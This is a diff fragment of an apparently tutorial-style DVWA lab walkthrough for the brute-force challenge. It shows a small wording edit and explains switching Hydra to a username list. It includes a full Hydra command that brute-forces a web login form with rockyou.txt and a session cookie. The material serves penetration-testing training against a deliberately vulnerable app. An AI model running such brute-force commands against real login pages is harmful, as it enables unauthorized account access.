keewenaw/dvwa-guide-2019/low/Challenge 01: Brute Force.md

   <li>"1337"</li>
 </ul>

 With this, we can easily modify our earlier Hydra command.
 We only need to make two changes.
 We capitalize the <code>-l</code> switch to <code>-L</code> to indicate we're now passing in a file.
-We then actually pass in a text file with all the usernames instead of <code>admin</code> (I called mine "users.txt").
+We then actually pass in a text file with all the usernames instead of the string <code>admin</code> (I called mine "users.txt").

 <code>hydra -L users.txt -P rockyou.txt -s 80 dvwa http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=[your_value_here]"</code>